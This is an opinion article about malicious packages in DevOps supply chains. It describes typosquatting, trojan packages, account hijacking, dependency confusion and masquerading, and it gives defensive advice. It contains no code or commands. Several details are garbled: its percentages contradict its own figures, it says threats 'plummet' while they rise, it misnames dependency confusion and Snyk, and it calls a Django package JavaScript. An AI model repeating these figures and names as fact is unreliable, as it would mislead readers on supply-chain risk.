The compound word, DevOps, defines an extensive procedure and culture that comprises the process and technology of software planning/development (Dev) and IT operations (Ops). DevOps has helped shorten the time for organizational system development, improving the running of software while attaining high-quality delivery as organizations offer services to customers (good customer experience).
These objectives are achieved through three factors;
♦ Shared ownership
♦ Automation in workflow and
♦ Timely feedback system.
In addition, Microsoft explained that DevOps help to Collaborate and coordinate isolated functions like development, IT operations, quality engineering, and security.
Given the immense benefits of DevOps, its demand surges indefinitely. This also gave rise to the intrusion of codes and software that masquerade as legitimate to cause harm and defect to the development process. These codes/software are malicious packages in DevOps.
The Saga Of Malicious Packages In DevOps
The case of malicious packages rises following the evolution of technology. They can penetrate the software development process through open-source or third-party services, hence, threatening the overall DevOps process.
Research shows that more than 60% of cyber threats resulted from compromises and vulnerabilities from third-party providers. Hackers perceive that it is easy to compromise vendor’s services to infiltrate an organization’s development system. Also, attackers masquerade through open sources to provide malicious codes, which will come with the software supply chain as the developer team installs the software.
Although we can’t say for sure when a malicious package was introduced to DevOps, the first technology to detect these packages was developed in 2019 by Sonatype. Sonatype tech proved more effective than antiviruses in detecting packages from open-source factors. They were the first technology to detect PoC research packages in 2020. 2020 ended with 1,200 detected packages. The figure soars to 12,000 in 2021. In 2022, Sonatype detected a shocking 8800 packages. A shocking 633% increase in malicious packages threatens DevOps.
Cybersecurity teams became alarmed as the percentage of DevOps malicious packages plummets. Meanwhile, due to the widespread use of Python’s package index (PyPI) and JavaScript’s package manager, Node Package Manager (npm), they have become the commonest programming language with the issue of malicious packages. According to the report from Synk, in Q1 of 2023, 6800 malicious packages have been recorded for PyPI and npm.
Although, malicious packages are accounted for across the PyPI and npm registries. Other platforms also encountered these packages. Examples are RubyGems, the Java collection, Maven Central and NuGet, and the Microsoft code-sharing program for .NET and .NET Core.
From their analysis, Synk Security Intelligence identified some packages with scripts like “preinstall” or “postinstall” which are capable of stealing sensitive data or installing malware, hence causing a defect in DevOps. One of the recently (in 2023) discovered javascript packages called Django-youth has the script “preinstall,” which begins its execution as users unknowingly install the packages. Some malicious packages carry out their execution by leading you to a different website.
How Malicious Packages Compromise DevOps
Research shows that most deployment of malicious packages aims to infiltrate organizational databases. Also, from observation, it is clear that most malicious packages in DevOps are used to perform activities like controlling remote trojans, theft of digital currencies, crypto mining (clearly evident in many crypto mining frauds), and theft of sensitive information.
However, for an attacker to perform these cybercrimes, they are methods they use including the following:
Typosquatting
Here the attacker makes a slight change or typographical error in the name of the original software. On the user end, an adequate examination was not done to detect the difference in spelling. This method is very common for open-source providers. You can find typosquatting in web pages and software package names.
Trojan Package
It works just like masquerading. The trojan package is created to have the resemblance of the legitimate software package but with slight, undetected dissimilarities. So, when you install this package, it can cause harm to your system or steal crucial data. An example of a Trojan is lemaaa which was used to hack discord accounts.
Hijacking
Hijacking is a very effective method with a very high infection rate, but it’s also a tough task. It involves hacking a developer’s account to hijack a known software package. This method was first discovered in October 2021 when maintainers’ accounts were hacked, and malicious codes were added to several versions of a package. The package is said to have about 1.5 billion downloads to date.
Independence Confusion
A DevOps platform says that managers prefer downloading packages with high version numbers in oblivion to legitimate packages with lower version numbers. This tendency has given way to the tricks of Independency confusion. The confusion here is that attackers publish a malicious package with the exact name of the legitimate package and assign to it a high version number making it attractive and probably the best choice.
Masquerading
It’s a deception that occurs when an attacker penetrates a legitimate package, duplicates its code and data, and in turn, incorporates malicious codes into the package with the exact name of the original package.
Dealing With Malicious Packages In DevOps
- Vigilantly monitor the software supply chain to detect threats to DevOps.
- Organizations should demand a thorough software bill of materials (SBOM) analysis from vendors. This will keep a record of the elements that make up the software package.
- Through mediums like Github, you can peruse the software package and its dependencies.
- Organizations can apply security testing across the systems development life cycle stages to ensure that malicious packages are quickly spotted.
Conclusion
According to Synk, malicious packages in DevOps rose to a whopping 11,973% in 2022 and 2023 compared to previous years. This mindblowing record is an alert to cybersecurity services to improve their technology. With a thorough examination, malicious packages still lie under the radar. Currently, DevOps platforms and security providers like Synk and Sonatype are doing their best to curb the rate of malicious threats in Systems development. It’s best for organizations to practice recommended strategies to protect their Systems development life cycle from malicious packages.
The opinions expressed in this post belong to the individual contributors and do not necessarily reflect the views of Information Security Buzz.